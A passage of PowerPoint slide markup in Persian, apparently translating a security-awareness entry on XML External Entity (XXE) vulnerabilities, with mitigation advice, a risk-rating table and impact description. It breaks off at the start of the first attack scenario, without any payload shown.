                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>در کد منبع برنامه کمک کند، اگر چه بررسی دستی کد بهترین گزینه در برنامه های بزرگ و پیچیده است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر این کنترل ها امکان پذیر نیست، از وصله های مجازی، دروازه های امنیتی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا فایروال های وب (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) برای شناسایی، نظارت و توقف حملات </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده کنید.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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2357753793"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۳</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۲</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۳</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fa-IR" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۳</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lvl="0" algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>اگر مهاجمان بتوانند </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> بارگذاری کنند یا محتوای</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> آلوده</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> در یک سند </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-AU" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> وارد کنند، از کد ها، وابستگی ها یا ادغام های آسیب پذیر</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>استفاده کنند،</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> می توانند از پردازنده های </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> آسیب پذیر برای مقاصد خود بهره برداری کنند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به طور پیش فرض، بسیاری از پردازنده های قدیمی تر </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>اجازه تعیین</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>یک موجود خارجی را می دهند،( یک </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>URI </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>که در پردازش </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>XML </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> محاسبه و ارزیابی می شود.)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ابزارهای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>SAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> می تواند این مسئله را با بررسی وابستگی ها و پیکربندی کشف کند. ابزارهای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>DAST</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> نیاز به مراحل دستی بیشتر برای شناسایی و بهره برداری از این مسئله دارند. آزمایش کنندگان دستی باید برای</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>چگونگی آزمایش </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>آموزش ببینند، زیرا معمولا از سال 2017 آزمایش نشده اند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>این نقص ها می تواند برای استخراج داده ها، اجرای یک درخواست از راه دور از سمت سرور، اسکن سیستم های داخلی، انجام حمله اختلال در سرویس و همچنین اجرای سایر حملات استفاده شود.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="just" rtl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تاثیر کسب و کار بستگی به الزامات حفاظتی همه برنامه های کاربردی متاثر و داده ها دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریوهای حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه در یک ارتباط </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
